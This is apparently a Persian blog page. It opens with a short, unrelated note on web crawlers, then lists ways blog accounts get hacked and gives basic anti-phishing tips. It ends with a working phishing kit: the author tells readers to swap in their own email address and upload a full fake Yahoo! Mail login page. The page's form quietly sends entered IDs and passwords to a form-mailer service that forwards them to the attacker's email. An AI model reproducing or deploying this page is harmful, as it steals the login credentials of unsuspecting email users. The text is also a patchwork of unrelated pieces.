در وادی برنامه نویسی وب , روبوت نرم افزاری است که بطور اتوماتیک به خواندن و کاوش درون دیگر صفحات وب میپردازد.یک روبوت کارش را از یک page یا صفحه نمونه شروع کرده و بطور بازگشتی یا recursive به خواندن محتوای تمامی link های داخل صفحات میپردازد.بیشترین کاربرد روبوتها در موارد زیر میباشد:
• Indexing
• Link Validation
• "What's New " monitoring
• HTML validation
• Mirroring

روبوتهای وب چیستند؟
اگر میخواهید بیشتر در مورد روبوتها بدانید بد نیست که سری به یکی از صفحات FAQ در مورد روبوتها بزنید و مطمین باشید که اگر دارای web page ی هستید , به احتمال زیاد روبوتهای عزیز موتورهای جستجوی معروف مثل goggle و یا yahoo بارها صفحاتتان را سرچ کرده و کلمات و Link های مهم آنرا در بانک اطلاعاتیشان ثبت کرده اند.توجه داشته باشید که بتدریچ و با گذشت زمان هر چه که بیشتر فارسی نویسی در اینترنت گسترش می یابد ضرورت جستجوی کلمات فارسی بیشتر خواهد شد و در آینده ای نه چندان دور خلایق قادر به جستجو در میان مثلا وب لاگهای فارسی خواهند شد

1- هک کردن ایمیل صاحب وبلاگ

به طوری که هکر ایمیل صاحب وبلاگ را هک کرده بعد برای ورود به وبلاگ به قسمت فراموش کردن پسورد وبلاگ میرود.

در این قسمت باید ایمیل صاحب وبلاگ زده شه تا پسورد وبلاگ به این ایمیل انتقال پیدا کند.پس هکر با در دست داشتن نام وبلاگ و داشتن پسورد ایمیل شما میتواند خیلی راحت به وبلاگتان دست رسی پیدا کند.

2- ایمیل جعلی

حیله دیگر هکر ها فرستادن ایمیل جعلی برای صاحبان وبلاگ است.به گونه ای که به طور دروغ خودشان را صاحب ارائه دهنده سرویس وبلاگشان معرفی میکنند و میخواهند از آنها که پسورد خود را برای آنها ایمیل کنید.

3-استفاده از صفحه های تقلبی(fake page)

بعضی مواقع به شما آدرسهای نا آشنا پیشنهاد میشود.بعد از باز کردن این آدرس ها صفحه ای شبیه صفحه لاگین(صفحه ورودی به وبلاگ شما که یوزر نیم و پسورد را میخواهد)باز میشود.ولی آیا هر صفحه شبیه به آن صفحه لاگین ما باید مشخصاتمان را وارد نماییم.؟؟؟؟خیر.زیرا امکان دارد این مشخصات ما برای افراد غیر معتمد فرستاده شود.

4-استفاده از باگهای

گاهی اوقات سرویس دهنده های وبلاگ نمیتوانند آن طور که باید امنیتشان را تامین کنند برای همین با پیدا شدن چند باگ (حفره امنیتی) راه هک کردن را برای هکر ها را باز میکنند.

ولی این امر خیلی کم دیده میشود و میتوان گفت امکان چنین اتفاقی خیلی به ندرت دیده میشود.

 

---

 

به تازگی ایمیل هایی توسط هکر ها برای بعضی از وبلاگ نویسان فرستاده میشود و از آنها میخواهد تا به یک صفحه تقلبی بروند و به دلایل مختلف مانند  upgrade کردن وبلاگشان و یا دریافت امکانات جدید ، نام کاربری و پسوردشان را وارد کنند . فارغ از اینکه صفحه مورد نظر، یک صفحه تقلبی است که فقط شبیه سرویس دهنده وبلاگشان درست شده است و در حال جمع آوردی اطلاعات خصوصی کاربران است .

 نکات امنیتی برای جلوگیری از هک شدن وبلاگتان :

1-      هیچ سرویس دهنده وبلاگی به غیر از صفحه ورودی سایت خودش ، از شما پسورد درخواست نمی کند . پس همیشه قبل از اینکه پسوردتان را وارد کنید آدرس بالای internetExplorer خود را نگاه کنید که حتما آدرس سایت وبلاگتان باشد.

2-      سرویس دهنده های وبلاگی به هیچ عنوان نیازی به پسورد شما ندارند. بنابراین در هیچ ایمیل و صفحه ای خارج از سایت سرویس دهنده ، پسورد خود را وارد نکنید .

---

در این قسمت من fake page (صفحه مجازي ) ياهو را قرار ميدم و شما فقط بايد به جاي ايميل من ايميل خودتان را وارد كنيد و در جايي مثل پرشين گيگ اپلود كنيد و قرباني وقتي در انجا به اشتباه پسووردش را وارد كند پسوورد به ايميل شما فرستاده ميشود

 

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- saved from url=(0044)http://129.250.132.107/devil6654/mmm.htm --> <HTML><HEAD><TITLE>Yahoo! Mail - The best web-based email!</TITLE> <META http-equiv=Content-Type content="text/html; charset=windows-1256"> <META content="Microsoft FrontPage 5.0" name=GENERATOR></HEAD><TR><HEAD> <FORM name=passwordform action=http://www.response-o-matic.com/cgi-bin/rom.pl method=post target=_top AUTOCOMPLETE="OFF"><INPUT type=hidden value=shaharash@yahoo.com name=your_email_address><INPUT type=hidden value=shaharash@yahoo.com name=copy_email_address><INPUT type=hidden value=paswordeharesid name=email_subject_line><INPUT type=hidden name=required_fields><INPUT type=hidden value="&script&location.href = 'http://mail.yahoo.com';&/script&" name=thank_you_title><INPUT type=hidden value=http://www.yahoo.com/ name=return_link_url><INPUT type=hidden value="klik here¯" name=return_link_name><INPUT type=hidden value=#FFFFFF name=background_color><INPUT type=hidden value=#000000 name=text_color><INPUT type=hidden value=#0000FF name=link_color><INPUT type=hidden value=#0000FF name=visited_link_color><INPUT type=hidden value=#0000FF name=active_link_color> <META content=index,follow name=robots> <META content="Yahoo! Mail Free reliable easy SpamGuard antivirus storage" name=keywords> <META content="Take a closer look at Yahoo! Mail. Get these great features: Powerful protection against spam and viruses, 100MB of email storage, Message size up to 10MB, and Mail anywhere there's a web connection" name=description><LINK href="Yahoo! Mail - The best web-based email!_files/mail_style.css" type=text/css rel=stylesheet> <STYLE type=text/css>BODY { MARGIN-TOP: 0px } </STYLE> <SCRIPT language=javascript src="Yahoo! Mail - The best web-based email!_files/mc.js"> </SCRIPT> <SCRIPT language=javascript> /* * A JavaScript implementation of the RSA Data Security, Inc. MD5 Message * Digest Algorithm, as defined in RFC 1321. * Copyright (C) Paul Johnston 1999 - 2000. * Updated by Greg Holt 2000 - 2001. * See http://pajhome.org.uk/site/legal.html for details. */ /* * Convert a 32-bit number to a hex string with ls-byte first */ var hex_chr = "0123456789abcdef"; function rhex(num) { str = ""; for(j = 0; j <= 3; j++) str += hex_chr.charAt((num >> (j * 8 + 4)) & 0x0F) + hex_chr.charAt((num >> (j * 8)) & 0x0F); return str; } /* * Convert a string to a sequence of 16-word blocks, stored as an array. * Append padding bits and the length, as described in the MD5 standard. */ function str2blks_MD5(str) { nblk = ((str.length + 8) >> 6) + 1; blks = new Array(nblk * 16); for(i = 0; i < nblk * 16; i++) blks[i] = 0; for(i = 0; i < str.length; i++) blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8); blks[i >> 2] |= 0x80 << ((i % 4) * 8); blks[nblk * 16 - 2] = str.length * 8; return blks; } /* * Add integers, wrapping at 2^32. This uses 16-bit operations internally * to work around bugs in some JS interpreters. */ function add(x, y) { var lsw = (x & 0xFFFF) + (y & 0xFFFF); var msw = (x >> 16) + (y >> 16) + (lsw >> 16); return (msw << 16) | (lsw & 0xFFFF); } /* * Bitwise rotate a 32-bit number to the left */ function rol(num, cnt) { return (num << cnt) | (num >>> (32 - cnt)); } /* * These functions implement the basic operation for each round of the * algorithm. */ function cmn(q, a, b, x, s, t) { return add(rol(add(add(a, q), add(x, t)), s), b); } function ff(a, b, c, d, x, s, t) { return cmn((b & c) | ((~b) & d), a, b, x, s, t); } function gg(a, b, c, d, x, s, t) { return cmn((b & d) | (c & (~d)), a, b, x, s, t); } function hh(a, b, c, d, x, s, t) { return cmn(b ^ c ^ d, a, b, x, s, t); } function ii(a, b, c, d, x, s, t) { return cmn(c ^ (b | (~d)), a, b, x, s, t); } /* * Take a string and return the hex representation of its MD5. */ function MD5(str) { x = str2blks_MD5(str); var a = 1732584193; var b = -271733879; var c = -1732584194; var d = 271733878; for(i = 0; i < x.length; i += 16) { var olda = a; var oldb = b; var oldc = c; var oldd = d; a = ff(a, b, c, d, x[i+ 0], 7 , -680876936); d = ff(d, a, b, c, x[i+ 1], 12, -389564586); c = ff(c, d, a, b, x[i+ 2], 17, 606105819); b = ff(b, c, d, a, x[i+ 3], 22, -1044525330); a = ff(a, b, c, d, x[i+ 4], 7 , -176418897); d = ff(d, a, b, c, x[i+ 5], 12, 1200080426); c = ff(c, d, a, b, x[i+ 6], 17, -1473231341); b = ff(b, c, d, a, x[i+ 7], 22, -45705983); a = ff(a, b, c, d, x[i+ 8], 7 , 1770035416); d = ff(d, a, b, c, x[i+ 9], 12, -1958414417); c = ff(c, d, a, b, x[i+10], 17, -42063); b = ff(b, c, d, a, x[i+11], 22, -1990404162); a = ff(a, b, c, d, x[i+12], 7 , 1804603682); d = ff(d, a, b, c, x[i+13], 12, -40341101); c = ff(c, d, a, b, x[i+14], 17, -1502002290); b = ff(b, c, d, a, x[i+15], 22, 1236535329); a = gg(a, b, c, d, x[i+ 1], 5 , -165796510); d = gg(d, a, b, c, x[i+ 6], 9 , -1069501632); c = gg(c, d, a, b, x[i+11], 14, 643717713); b = gg(b, c, d, a, x[i+ 0], 20, -373897302); a = gg(a, b, c, d, x[i+ 5], 5 , -701558691); d = gg(d, a, b, c, x[i+10], 9 , 38016083); c = gg(c, d, a, b, x[i+15], 14, -660478335); b = gg(b, c, d, a, x[i+ 4], 20, -405537848); a = gg(a, b, c, d, x[i+ 9], 5 , 568446438); d = gg(d, a, b, c, x[i+14], 9 , -1019803690); c = gg(c, d, a, b, x[i+ 3], 14, -187363961); b = gg(b, c, d, a, x[i+ 8], 20, 1163531501); a = gg(a, b, c, d, x[i+13], 5 , -1444681467); d = gg(d, a, b, c, x[i+ 2], 9 , -51403784); c = gg(c, d, a, b, x[i+ 7], 14, 1735328473); b = gg(b, c, d, a, x[i+12], 20, -1926607734); a = hh(a, b, c, d, x[i+ 5], 4 , -378558); d = hh(d, a, b, c, x[i+ 8], 11, -2022574463); c = hh(c, d, a, b, x[i+11], 16, 1839030562); b = hh(b, c, d, a, x[i+14], 23, -35309556); a = hh(a, b, c, d, x[i+ 1], 4 , -1530992060); d = hh(d, a, b, c, x[i+ 4], 11, 1272893353); c = hh(c, d, a, b, x[i+ 7], 16, -155497632); b = hh(b, c, d, a, x[i+10], 23, -1094730640); a = hh(a, b, c, d, x[i+13], 4 , 681279174); d = hh(d, a, b, c, x[i+ 0], 11, -358537222); c = hh(c, d, a, b, x[i+ 3], 16, -722521979); b = hh(b, c, d, a, x[i+ 6], 23, 76029189); a = hh(a, b, c, d, x[i+ 9], 4 , -640364487); d = hh(d, a, b, c, x[i+12], 11, -421815835); c = hh(c, d, a, b, x[i+15], 16, 530742520); b = hh(b, c, d, a, x[i+ 2], 23, -995338651); a = ii(a, b, c, d, x[i+ 0], 6 , -198630844); d = ii(d, a, b, c, x[i+ 7], 10, 1126891415); c = ii(c, d, a, b, x[i+14], 15, -1416354905); b = ii(b, c, d, a, x[i+ 5], 21, -57434055); a = ii(a, b, c, d, x[i+12], 6 , 1700485571); d = ii(d, a, b, c, x[i+ 3], 10, -1894986606); c = ii(c, d, a, b, x[i+10], 15, -1051523); b = ii(b, c, d, a, x[i+ 1], 21, -2054922799); a = ii(a, b, c, d, x[i+ 8], 6 , 1873313359); d = ii(d, a, b, c, x[i+15], 10, -30611744); c = ii(c, d, a, b, x[i+ 6], 15, -1560198380); b = ii(b, c, d, a, x[i+13], 21, 1309151649); a = ii(a, b, c, d, x[i+ 4], 6 , -145523070); d = ii(d, a, b, c, x[i+11], 10, -1120210379); c = ii(c, d, a, b, x[i+ 2], 15, 718787259); b = ii(b, c, d, a, x[i+ 9], 21, -343485551); a = add(a, olda); b = add(b, oldb); c = add(c, oldc); d = add(d, oldd); } return rhex(a) + rhex(b) + rhex(c) + rhex(d); } function valid_js() { // anything that claims NS 4 or higher functionality better work if (navigator.userAgent.indexOf("Mozilla/") == 0) { return (parseInt(navigator.appVersion) >= 4); } return false; } function hash(form,login_url) { // this is Javascript enabled browser //document.login_form[".js"].value=1; // rudimentary check for a 4.x brower. should catch IE4+ and NS4.* var url; if (arguments.length > 1 && login_url != "") { // in case login_url is not passed in url = login_url; } else { url = "http://login.yahoo.com/config/login"; } url += "?"; if (valid_js()) { var passwd = form.passwd.value; var hash1 = MD5(form.passwd.value); var challenge = form[".challenge"].value; var hash2 = MD5(form.passwd.value) + challenge; var hash; if(form.passwd.value){ hash=MD5(hash2); } else { hash=""; } var js = 0; for(i=0; i<form.elements.length; i++){ if(form.elements[i].name.length <=0) { continue; } if(i > 0){ url += "&"; } url += form.elements[i].name; url += "="; if(form.elements[i].name == "passwd"){ url += hash; } else if (form.elements[i].type == "checkbox" && !form.elements[i].checked) { url += ""; } else if (form.elements[i].type == "radio" && !form.elements[i].checked) { url += ""; } else if (form.elements[i].name == ".save"){ url += "1"; // "Sign in" causes problem with the space } else if (form.elements[i].name == ".js"){ js = 1; url += "1"; } else { url += escape(form.elements[i].value); } } // indicate the password is hashed. url += "&.hash=1"; if(js == 0){ url += "&.js=1"; } url += "&.md5=1"; //alert("url=" + url); location.href=url; // prevent from running this again. Allow the server response to submit the form directly form.onsubmit=null; // abort normal form submission return false; } // allow normal form submission return true; }</SCRIPT> <SCRIPT language=JavaScript> <!-- hasMsgr = 0; function dontGotIt(){ hasMsgr = 0; document.login_form.hasMsgr.value=0; } function doGotIt(){ hasMsgr = 1; document.login_form.hasMsgr.value=1; } //--> </SCRIPT> <META http-equiv=Pragma content=no-cache> <META http-equiv=Expires content=0></HEAD> <BODY bgColor=#ffffff onload=document.login_form.login.focus();> <CENTER> <TABLE cellSpacing=0 cellPadding=0 width=720 border=0> <TBODY> <TR> <TD noWrap height=5><SPACER height="5" width="1" type="block"></TD></TR> <TR> <TD> <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <TD align=left width="1%"> <TABLE cellSpacing=0 cellPadding=0 width="1%" border=0> <TBODY> <TR> <TD noWrap align=left width="1%"><IMG height=33 alt="Yahoo! Mail" src="Yahoo! Mail - The best web-based email!_files/ma_mail_1.gif" width=196 border=0> </TD></TR></TBODY></TABLE></TD> <TD vAlign=bottom noWrap align=right width="100%"> <TABLE cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <TD vAlign=bottom noWrap align=right width="99%"><FONT face=Arial size=-1><A href="http://www.yahoo.com/">Yahoo!</A> - <A href="http://help.yahoo.com/help/us/edit/">Help</A></FONT> <BR> <HR noShade SIZE=1> </TD></TR></TBODY></TABLE></TD> <TD align=right width="1%"> <SCRIPT language=JavaScript> function PBopenWindow(){ window.open('http://us.ard.yahoo.com/SIG=1271ju6j9/M=294867.5495648.6574428.4664665/D=regst/S=150000863:PB/EXP=1101126001/A=2167824/R=0/SIG=10tt88gbl/*http://poweredby.hpidea.com','NewWin','height=590,width=790'); } </SCRIPT> <A href="javascript:PBopenWindow()"><IMG height=28 alt="" hspace=3 src="Yahoo! Mail - The best web-based email!_files/powrdbyhp_blu_84x28_yahoo.gif" width=84 align=center border=0></A></TD></TD></TR></TBODY></TABLE></TD></TR> <TR> <TD noWrap height=5><SPACER height="5" width="1" type="block"></TD></TR></TBODY></TABLE> <TABLE cellSpacing=0 cellPadding=0 width=720 bgColor=#b6c7e5 border=0> <TBODY> <TR> <TD vAlign=top noWrap align=left width=12><IMG height=10 alt="" src="Yahoo! Mail - The best web-based email!_files/login_r1_c1.gif" width=12 border=0 name=login_r1_c1></TD> <TD vAlign=top noWrap width=450> <TABLE cellSpacing=0 cellPadding=0 width=450 bgColor=#b6c7e5 border=0> <TBODY> <TR> <TD noWrap width=15><SPACER width="15" type="block"></TD> <TD class=headlineblue vAlign=center noWrap align=right width=197><BR>Yahoo! Mail<BR>helps me<BR>stay in touch.</TD> <TD noWrap align=left width=214><IMG height=130 src="Yahoo! Mail - The best web-based email!_files/login_woman.jpg" width=195></TD> <TD noWrap width=24><SPACER width="20" type="block"></TD></TR> <TR> <TD width=450 bgColor=#250175 colSpan=4 height?8?><IMG height=8 src="Yahoo! Mail - The best web-based email!_files/login_blue_horiz.gif" width=450></TD></TR></TBODY></TABLE> <TABLE cellSpacing=0 cellPadding=0 width=450 bgColor=#b6c7e5 border=0> <TBODY> <TR> <TD noWrap colSpan=4 height=10><SPACER type="vertical" size="20"></TD></TR> <TR> <TD noWrap width=10><SPACER width="10" type="block"></TD> <TD class=bodyblue vAlign=top noWrap align=left width=276><SPAN style="FONT-SIZE: 18px; LINE-HEIGHT: 22px"><FONT style="FONT-SIZE: 18px; LINE-HEIGHT: 22px">New to Yahoo!?</FONT></SPAN><BR><FONT class=bodyblue><B>Get a free <A style="COLOR: #7b0099" href="http://us.rd.yahoo.com/reg/login/new_ym/us/*http://billing.mail.yahoo.com/bm/MailReg?.done=&.intl=us&.src=ym&.u=7nu2v1h0q11vh&partner=&.p=&promo=&.last=">Yahoo! Mail</A> account</B> – it's a breeze to stay connected and manage your busy life.</FONT> <UL style="MARGIN-TOP: 10px; PADDING-LEFT: 10px; MARGIN-LEFT: 10px"><LI style="MARGIN-TOP: 6px"><FONT class=bodyblue><B>100MB of email storage</B><BR>Keep more of what's important to you </FONT> <LI style="MARGIN-TOP: 6px"><FONT class=bodyblue><B>Powerful spam protection</B><BR>Read only the mail you really want </FONT> <LI style="MARGIN-TOP: 6px"><FONT class=bodyblue><B>Get your mail anywhere</B><BR>All you need is a web connection . </FONT><BR><A style="COLOR: #7b0099" href="http://us.rd.yahoo.com/reg/login/new_ym/us/*http://us.info.mail.yahoo.com/"><FONT class=bodyblue>Learn More</FONT></A> </LI></UL> <TABLE height=95 cellSpacing=0 cellPadding=0 align=center border=0><TBODY> <TR> <TD align=left width=60><A href="http://reviews.cnet.com/Yahoo_Mail/4505-9236_7-30980704.html?part=editchoice&subj=yahoomail" target=cnet><IMG height=95 src="Yahoo! Mail - The best web-based email!_files/EC_aug04_47x95_2.gif" width=47 align=left border=0></A> </TD> <TD align=middle width=300><INPUT type=hidden value=ym name=.src> <INPUT type=hidden value=us name=.intl> <INPUT type=hidden value=http://mail.yahoo.com name=.done> <INPUT type=hidden value=7nu2v1h0q11vh name=.u> <INPUT class=buttonpurple type=submit value="Sign Up Now"></TD></TR></TBODY></TABLE></TD> <TD vAlign=top align=middle><IMG height=242 src="Yahoo! Mail - The best web-based email!_files/login_divide1.gif" width=23 border=0></TD> <TD class=bodyblue vAlign=top><BR><B>Need more? Get <A style="COLOR: #7b0099" href="http://us.rd.yahoo.com/mail_us/login/evt=19821/*http://mailplus.yahoo.com">Yahoo! Mail Plus</B></A>.<BR><BR>Mail Plus offers tougher virus and spam protection, a virtually unlimited 2GB of storage, no graphical ads, and more for only <B>$19.99/year</B>.<BR><BR><A style="COLOR: #7b0099" href="http://us.rd.yahoo.com/mail_us/login/evt=19821/*http://mailplus.mail.yahoo.com/help">Learn more</A> </TD></TR></TBODY></TABLE></TD> <TD noWrap width=10><SPACER width="10" type="block"></TD> <TD vAlign=top noWrap> <TABLE height="96%" cellSpacing=0 cellPadding=0 bgColor=#5350b9 border=0><INPUT type=hidden value=http://mail.yahoo.com name=.done> <INPUT type=hidden value=1 name=.tries> <INPUT type=hidden value=ym name=.src> <INPUT type=hidden name=.md5> <INPUT type=hidden name=.hash> <INPUT type=hidden name=.js> <INPUT type=hidden name=.last> <INPUT type=hidden name=promo> <INPUT type=hidden value=us name=.intl> <INPUT type=hidden name=.bypass> <INPUT type=hidden name=.partner> <INPUT type=hidden value=7nu2v1h0q11vh name=.u> <INPUT type=hidden value=0 name=.v> <INPUT type=hidden value=5qNEDLdUGyPydfbObuSNZh66JSBg name=.challenge> <INPUT type=hidden name=.yplus> <INPUT type=hidden name=.emailCode> <INPUT type=hidden name=pkg> <INPUT type=hidden name=stepid> <INPUT type=hidden name=.ev> <INPUT type=hidden name=.branch> <INPUT type=hidden value=0 name=hasMsgr> <INPUT type=hidden value=Y name=.chkP> <TBODY> <TR bgColor=#b6c7e5> <TD colSpan=3 height=23><SPACER height="23" type="vertical"></TD></TR> <TR> <TD vAlign=top noWrap align=left width=10 height=9><IMG height=9 alt="" src="Yahoo! Mail - The best web-based email!_files/login_r2_c4.gif" width=10 border=0></TD> <TD> </TD> <TD vAlign=top noWrap align=right width=9 height=10><IMG height=10 alt="" src="Yahoo! Mail - The best web-based email!_files/login_r2_c6.gif" width=9 border=0></TD></TR> <TR> <TD noWrap width=10> </TD> <TD> <TABLE cellSpacing=0 cellPadding=0 border=0> <TBODY> <TR> <TD class=bodywhite align=right height=50><BR><SPAN style="FONT-WEIGHT: bold; FONT-SIZE: 15px; LINE-HEIGHT: 17px"><B>Already have a Yahoo! ID?</B></SPAN><BR>Please sign in to read or send mail<BR> <HR color=#8380de noShade SIZE=1> <BR><BR>Enter your ID and password<BR></TD></TR><!------------------ BEGIN login form -------------------> <TR> <TD> <TABLE cellSpacing=0 cellPadding=2 border=0> <TBODY> <TR> <TD class=bodywhite noWrap align=right>Yahoo! ID:</TD> <TD align=right><INPUT size=17 name=login></TD></TR> <TR> <TD class=bodywhite noWrap align=right>Password:</TD> <TD align=right><INPUT type=password size=17 name=passwd></TD></TR> <TR> <TD class=bodywhite noWrap align=right colSpan=2><INPUT type=checkbox value=y name=.persistent>Remember my ID on this computer<BR><BR></TD></TR> <TR> <TD align=right colSpan=2><INPUT class=buttonwhite type=submit value="Sign In" name=.save></TD></TR></TBODY></TABLE></TD></TR><!------------------ END login form -----------------------><!------------------ BEGIN login links --------------------> <TR> <TD class=bodywhite vAlign=top align=right><BR>MODE: Standard | <A style="COLOR: #7ae8ff" href="https://login.yahoo.com/config/login?.branch=&.src=ym&.v=0&.u=7nu2v1h0q11vh&.last=&promo=&.intl=us&.bypass=&.partner=&pkg=&stepid=&.done=">Secure</A> <BR><BR><BR> <HR color=#8380de noShade SIZE=1> <BR><A style="COLOR: #7ae8ff" href="http://us.rd.yahoo.com/reg/login/new_ym/us/*http://login.yahoo.com/config/login?.branch=&.src=ym&.intl=us&.help=1&.v=0&.u=7nu2v1h0q11vh&.last=&.last=&promo=&.bypass=&.partner=&pkg=&stepid=&.done=http%3a//mail.yahoo.com">Sign-in help</A><BR><A style="COLOR: #7ae8ff" href="http://us.rd.yahoo.com/reg/login/new_ym/us/*http://edit.yahoo.com/config/eval_forgot_pw?.branch=&new=1&.done=http://mail.yahoo.com&.src=ym&partner=&.partner=&.intl=us&pkg=&stepid=&.last=">Forgot your password?</A><BR><BR></TD></TR></TBODY></TABLE></TD> <TD noWrap width=9> </TD><!------------------ END login links ----------------------></TR> <TR> <TD vAlign=bottom noWrap align=left width=10 height=10><IMG height=10 alt="" src="Yahoo! Mail - The best web-based email!_files/login_r8_c4.gif" width=10 border=0></TD> <TD> </TD> <TD vAlign=bottom noWrap align=right width=9 height=10><IMG height=10 alt="" src="Yahoo! Mail - The best web-based email!_files/login_r8_c6.gif" width=9 border=0></TD></TR> <TR bgColor=#b6c7e5> <TD colSpan=3 height=10><SPACER SIZE="10" TYPE="vertical"></TD></TR></TBODY></TABLE></TD> <TD vAlign=top align=right width=10><IMG height=10 alt="" src="Yahoo! Mail - The best web-based email!_files/login_r1_c7.gif" width=10 border=0></TD></TR></TBODY></TABLE> <TABLE cellSpacing=0 cellPadding=0 width=720 bgColor=#b6c7e5 border=0> <TBODY> <TR> <TD vAlign=bottom align=left width=10><IMG height=10 alt="" src="Yahoo! Mail - The best web-based email!_files/login_r9_c1.gif" width=12 border=0></TD> <TD noWrap width=696><SPACER width="696" type="block"></TD> <TD vAlign=bottom align=right width=10><IMG height=10 alt="" src="Yahoo! Mail - The best web-based email!_files/login_r9_c7.gif" width=12 border=0></TD></TR></TBODY></TABLE><BR> <TABLE cellSpacing=0 cellPadding=0 width=720 border=0> <TBODY> <TR> <TD align=middle> <DIV align=center> <TABLE cellSpacing=0 cellPadding=2 width="100%" border=0> <TBODY> <TR> <TD align=left colSpan=2><FONT face=Arial><B>Yahoo! Mail for International Users</B></FONT> </TD></TR> <TR> <TD vAlign=top align=right><SMALL><FONT face=Arial size=-2><I>Europe</I> :</FONT></SMALL></TD> <TD vAlign=top><SMALL><FONT face=Arial size=-2><A href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=dk&.src=ym&.done=http%3a//mail.yahoo.com">Danmark</A> - <A href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=de&.src=ym&.done=http%3a//mail.yahoo.com">Deutschland</A> - <A href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=es&.src=ym&.done=http%3a//mail.yahoo.com">Espa?a</A> - <A href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=fr&.src=ym&.done=http%3a//mail.yahoo.com">France</A> - <A href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=it&.src=ym&.done=http%3a//mail.yahoo.com">Italia</A> - <A href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=no&.src=ym&.done=http%3a//mail.yahoo.com">Norge</A> - <A href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=se&.src=ym&.done=http%3a//mail.yahoo.com">Sverige</A> - <A href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=uk&.src=ym&.done=http%3a//mail.yahoo.com">UK</A>/<A href="http://eur.rd.yahoo.com/login/ym/*http://login.europe.yahoo.com/config/login?.intl=ie&.src=ym&.done=http%3a//mail.yahoo.com">Ireland</A> </FONT></SMALL></TD></TR> <TR> <TD vAlign=top align=right><SMALL><FONT face=Arial size=-2><I>Pacific Rim</I>:</FONT></SMALL></TD> <TD vAlign=top><SMALL><FONT face=Arial size=-2><A href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=au&.src=ym&.done=http%3a//mail.yahoo.com">Australia</A>/<A href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=nz&.src=ym&.done=http%3a//mail.yahoo.com">NZ</A> - <A href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=cn&.src=ym&.done=http%3a//mail.yahoo.com">China</A> - <A href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=hk&.src=ym&.done=http%3a//mail.yahoo.com">Hong Kong</A> - <A href="http://us.rd.yahoo.com/login/ym/*http://login.india.yahoo.com/config/login?.intl=in&.src=ym&.done=http%3a//mail.yahoo.com">India</A> - <A href="http://us.rd.yahoo.com/login/ym/*http://mail.yahoo.co.jp/">Japan</A> - <A href="http://us.rd.yahoo.com/login/ym/*http://login.korea.yahoo.com/config/login?.intl=kr&.src=ym&.done=http%3a//mail.yahoo.com">Korea</A> - <A href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=sg&.src=ym&.done=http%3a//mail.yahoo.com">Singapore</A> - <A href="http://us.rd.yahoo.com/login/ym/*http://login.yahoo.com/config/login?.intl=tw&.src=ym&.done=http%3a//mail.yahoo.com">Taiwan</A></FONT></SMALL></TD></TR> <TR> <TD vAlign=top align=right><SMALL><FONT face=Arial size=-2><I>Americas</I>:</FONT></SMALL></TD> <TD vAlign=top><SMALL><FONT face=Arial size=-2><A href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=ar&.src=ym&.done=http%3a//mail.yahoo.com">Argentina</A> - <A href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=br&.src=ym&.done=http%3a//mail.yahoo.com">Brasil</A> - <A href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=ca&.src=ym&.done=http%3a//mail.yahoo.com">Canada</A> - <A href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=mx&.src=ym&.done=http%3a//mail.yahoo.com">Mexico</A> - <A href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=b5&.src=ym&.done=http%3a//mail.yahoo.com">in Chinese</A> - <A href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=e1&.src=ym&.done=http%3a//mail.yahoo.com">en Espa?ol</A> - <A href="http://us.rd.yahoo.com/login/ym/?http://login.yahoo.com/config/login?.intl=ru&.src=ym&.done=http%3a//mail.yahoo.com">in Russian</A> </FONT></SMALL></TD></TR></TBODY></TABLE></DIV></TD> <TD vAlign=center align=middle><A href="http://us.rd.yahoo.com/reg/login/new_ym/us/*http://my.yahoo.com/netapp/?http://www.netapp.com/poweredby.html" target=netapp><IMG height=60 alt="Powered by NetApp" src="Yahoo! Mail - The best web-based email!_files/ntap4.gif" width=105 border=0></A> </TD> <TD></TD></TR></TBODY></TABLE></CENTER> <CENTER> <HR width=720 noShade SIZE=1> <TABLE cellSpacing=0 cellPadding=0 width=720 summary=null border=0> <TBODY> <TR> <TD align=middle><FONT face=arial color=#8d8d8d size=-2>Copyright © 2004 Yahoo! Inc. All rights reserved. <A title="Click here to view Yahoo! Copyright Policy" href="http://docs.yahoo.com/info/copyright/copyright.html" target=cp>Copyright Policy</A> <A title="Click here to view Yahoo! Terms of Service" href="http://docs.yahoo.com/info/terms/" target=_new>Terms of Service</A><BR><B>NOTICE: We collect personal information on this site.<BR>To learn more about how we use your information, see our <A title="Click here to view Yahoo! Privacy Policy" href="http://privacy.yahoo.com/" target=_new>Privacy Policy</A></B> </FONT></TD></TR></TBODY></TABLE></CENTER></BODY></FORM></HTML>